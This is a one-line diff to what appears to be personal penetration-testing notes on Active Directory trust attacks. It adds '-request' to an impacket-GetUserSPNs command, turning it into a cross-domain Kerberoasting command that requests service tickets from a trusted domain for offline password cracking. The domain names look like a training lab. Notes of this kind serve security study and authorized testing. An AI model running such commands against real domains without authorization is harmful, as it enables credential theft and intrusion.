KiritoLoveAsuna/Penetration-Testing/Active Directory Trusts Attacks.md

 ```
 Linux
 ```
-Impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley(a user that can authenticate into the other domain)
+impacket-GetUserSPNs -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley(a user that can authenticate into the other domain)
 ```